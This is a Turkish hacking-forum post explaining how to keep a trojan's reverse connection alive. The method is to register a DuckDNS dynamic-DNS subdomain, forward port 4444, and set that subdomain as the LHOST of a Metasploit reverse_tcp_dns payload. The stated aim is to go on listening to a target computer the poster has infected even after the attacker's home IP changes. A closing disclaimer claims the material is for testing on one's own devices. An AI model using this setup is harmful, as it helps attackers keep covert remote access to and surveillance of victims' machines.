Hoşgeldin Misafir

Trojanda Kalıcılık nasıl Sağlanır

Dr Leland Townsend

6 Eyl 2017
16,496 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
DUCKDNS, DDNS nedir?

Arkadaşlar https://www.duckdns.org/ DDNS, bilinen diğer adıyla Dinamik DNS kullanıcıların statik bir IP adresine sahip olamadığı durumlarda bu hizmeti dolaylı yoldan almasını sağlayan bir teknolojidir. IP adresleri, internet servis sağlayıcılar tarafından kullanıcılara statik ya da dinamik şekilde tahsis edilirler. Dinamik IP adresleri, her internet bağlantısını gerçekleştirdiğimizde değişen, sabitliği saatlerle sınırlı olan ve internet servis sağlayıcı tarafından bir IP havuzu içerisinden rastgele dağıtılan IP adresleridir. Statik IP adresleri ise kullanıcının talebi doğrultusunda aylık belirli bir ücret karşılığında, değişmeden, sabit olarak kalan, kullanıcıya özel olarak tahsis edilmiş IP adresleridir.

DUCKDNS, DDNS'yi ''BİZ'' Nerede kullanabiliriz?

Hazırladığımız ve karşıya yedirdiğimiz trojanımızda kalıcılığı sağlamak adına kullanabiliriz. En basitinden bizlerin kullandığı (DİNAMİK) ev ağında modem kapanıp açılınca ip değişiyor ve trojanımızdaki çıkış ip, yani bizim çıkış ip'miz değişmiş oluyor ve trojanımız işlevini yitiriyor ve hedef bilgisayarı dinleyemez hale geliyoruz. Bu durumda duckdns yardımımıza koşuyor.

Birinci Adım :


Lkt6Fa.jpg


Siteye yukarıda gösterilen seçeneklerden birini seçip Login oluyoruz.

İkinci Adım :

xIiBHV.jpg


Resimde görüldüğü gibi IP adresimiz duck dns tarafından bize verilen subdomain adresi ile eşleşti.

Bu domaini nasıl kullanacağız:

İlk olarak modemimize port açıyoruz, herkesin modemi ayrı ve arayüzü farklı olduğundan resim ile yardımcı olamayacağım, kısa bir google araştırmasında modeminize uygun arayüzde nası port açılacağınız gözükecektir. Neden port açıyoruz? çünkü hedef bilgisayar bilgilerini açtığımız bu port üzerinden bize gönderecek. Açtığımız port 4444 olarak sayalım.

2D1pt3.jpg


(DUCKDNS YAZILIMINI KURMADAN İŞLEVSİZDİR AŞŞAĞIDAKİ KOD ÖRNEK OLARAK VERİLMİŞTİR, DUCKDNS SİTESİ ÜZERİNDEN İŞLETİM SİSTEMİNİZE UYGUN KURULUM VİDEOLU OLARAK GÖSTERİLMİŞTİR.)

Şimdi yukarıdaki domaini metasploitimizin çıkış ipsine ve açtığımız portu çıkış portuna yazabiliriz,
örnek: reverse_tcp_dns LHOST=ddnsdeneme.duckdns.org LPORT=4444

böylece ipmiz değişse bile, dinleyicimize LHOST ipsi üzerinden ''192.168.1.1 örnek lhost ipsidir terminalinize veya cmdnize ifconfig yazarak görebilirsiniz'' açtığımız LPORT ''4444 açmıştık'' üzerinden bize bilgi akışı sağlanacaktır. Trojan hedefte açık olduğu sürece IP'niz değişse bile payloadınız işlevini yitirmeyecektir.

Not:Konu sadece siber güvenlik ile ilgilenip, kendi eşyalarınız üzerinde test etmek için, bilgi amaçlı paylaşılmıştır. Kötü amaçlı kullanımından sorumlu olmayıp, Kötü amaçlarda kullanmamanızı temmeni ediyorum